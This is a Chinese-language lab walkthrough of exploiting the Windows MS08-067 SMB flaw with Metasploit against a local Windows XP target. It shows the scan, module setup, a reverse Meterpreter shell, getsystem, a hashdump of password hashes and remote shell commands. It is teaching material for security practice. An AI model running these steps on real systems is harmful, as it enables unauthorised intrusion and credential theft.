MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程履行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击.
下面的实验为本地测试环境,一台Kali主机攻击机,一台Windows Xp靶机
Kali攻击机:192.168.34.220
windows Xp: 192.168.34.189
步骤一、启动postgresql
root@kali:~# /etc/init.d/postgresql restart [ ok ] Restarting PostgreSQL 9.1 database server: main. |
步骤二、启动metasploit
root@kali:~# /etc/init.d/metasploit restart [ ok ] Stopping Metasploit worker: worker. [ ok ] Stopping Metasploit web server: thin. [ ok ] Stopping Metasploit rpc server: prosvc. [ ok ] Starting Metasploit rpc server: prosvc. [ ok ] Starting Metasploit web server: thin. [ ok ] Starting Metasploit worker: worker. root@kali:~# msfconsole _---------. .' ####### ;." .---,. ;@ @@`; .---,.. ." @@@@@'.,'@@ @@@@@',.'@@@@ ". '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @; `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .' "--'.@@@ -.@ @ ,'- .'--" ".@' ; @ @ `. ;' |@@@@ @@@ @ . ' @@@ @@ @@ , `.@@@@ @@ . ',@@ @ ; _____________ ( 3 C ) /|___ / Metasploit! ;@'. __*__,." |--- _____________/ '(.,...."/ Trouble managing data? List, sort, group, tag and search your pentest data in Metasploit Pro -- learn more on http://rapid7.com/metasploit =[ metasploit v4.11.4-2015071402 ] + -- --=[ 1476 exploits - 931 auxiliary - 246 post ] + -- --=[ 432 payloads - 37 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] |
步骤三、查看数据连接状态
msf > db_status [*] postgresql connected to msf3 |
步骤四、启动nmap 扫描
msf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.34.189 [*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-09-24 14:39 CST [*] Nmap: Nmap scan report for 192.168.34.189 [*] Nmap: Host is up (0.0082s latency). [*] Nmap: Not shown: 989 closed ports [*] Nmap: PORT STATE SERVICE VERSION [*] Nmap: 25/tcp open smtp Microsoft ESMTP 6.0.2600.5512 [*] Nmap: 80/tcp open http Microsoft IIS httpd 5.1 [*] Nmap: 135/tcp open msrpc Microsoft Windows RPC [*] Nmap: 139/tcp open netbios-ssn [*] Nmap: 443/tcp open https? [*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds [*] Nmap: 777/tcp open multiling-http? [*] Nmap: 1025/tcp open msrpc Microsoft Windows RPC [*] Nmap: 6002/tcp open http SafeNet Sentinel License Monitor httpd 7.3 [*] Nmap: 7001/tcp open afs3-callback? [*] Nmap: 7002/tcp open http SafeNet Sentinel Keys License Monitor httpd 1.0 (Java Console) [*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : [*] Nmap: SF-Port777-TCP:V=6.47%I=7%D=9/24%Time=56039AF6%P=x86_64-unknown-linux-gnu% [*] Nmap: SF:r(Kerberos,5,"x01�txe0x06")%r(SMBProgNeg,5,"x01�txe0x06")%r(T [*] Nmap: SF:erminalServer,A,"x01�txe0x06x01�txe0x06")%r(WMSRequest,5,"x0 [*] Nmap: SF:1�txe0x06"); [*] Nmap: MAC Address: 00:0C:29:84:07:87 (VMware) [*] Nmap: Device type: general purpose [*] Nmap: Running: Microsoft Windows XP [*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3 [*] Nmap: OS details: Microsoft Windows XP SP2 or SP3 [*] Nmap: Network Distance: 1 hop [*] Nmap: Service Info: Host: dh-ca8822ab9589; OS: Windows; CPE: cpe:/o:microsoft:windows [*] Nmap: Host script results: [*] Nmap: | smb-check-vulns: [*] Nmap: | MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run) [*] Nmap: | Conficker: Likely CLEAN [*] Nmap: | regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run) [*] Nmap: | SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run) [*] Nmap: | MS06-025: CHECK DISABLED (add '--script-args=unsafe=1' to run) [*] Nmap: |_ MS07-029: CHECK DISABLED (add '--script-args=unsafe=1' to run) [*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 169.76 seconds |
步骤五、搜索漏洞模块
msf > search ms08-067 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption msf > use exploit/windows/smb/ms08_067_netapi |
步骤六、查看配置选项
msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting |
步骤七、配置参数
msf exploit(ms08_067_netapi) > set RHOST 192.168.34.189 RHOST => 192.168.34.189 msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.34.189 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.34.189 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting |
步骤八、开始利用
msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 192.168.34.220:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 3 - lang:English [*] Selected Target: Windows XP SP3 English (AlwaysOn NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (885806 bytes) to 192.168.34.189 [*] Meterpreter session 1 opened (192.168.34.220:4444 -> 192.168.34.189:1059) at 2015-09-24 14:45:52 +0800 |
步骤九、成功返回shell ,meterpreter 的操作
meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).hashdump meterpreter > hashdump Administrator:500:0182bd0bd4444bf8aad3b435b51404ee:328727b81ca05805a68ef26acb252039::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1::: IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d::: IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::meterpreter > shell Process 3368 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:WINDOWSsystem32>ipconfig ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 192.168.34.189 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.34.254 C:WINDOWSsystem32>net user net user User accounts for \ ------------------------------------------------------------------------------- Administrator Guest HelpAssistant IUSR_DH-CA8822AB9589 IWAM_DH-CA8822AB9589 SUPPORT_388945a0 The command completed with one or more errors. |
关于分享内容中的靶机,请百度搜索一下。虽然分享的不是很高级,但是希望大家也能看的懂,当然本站所提供的内容,并不是希望大家做危害国家,以及安全的事情。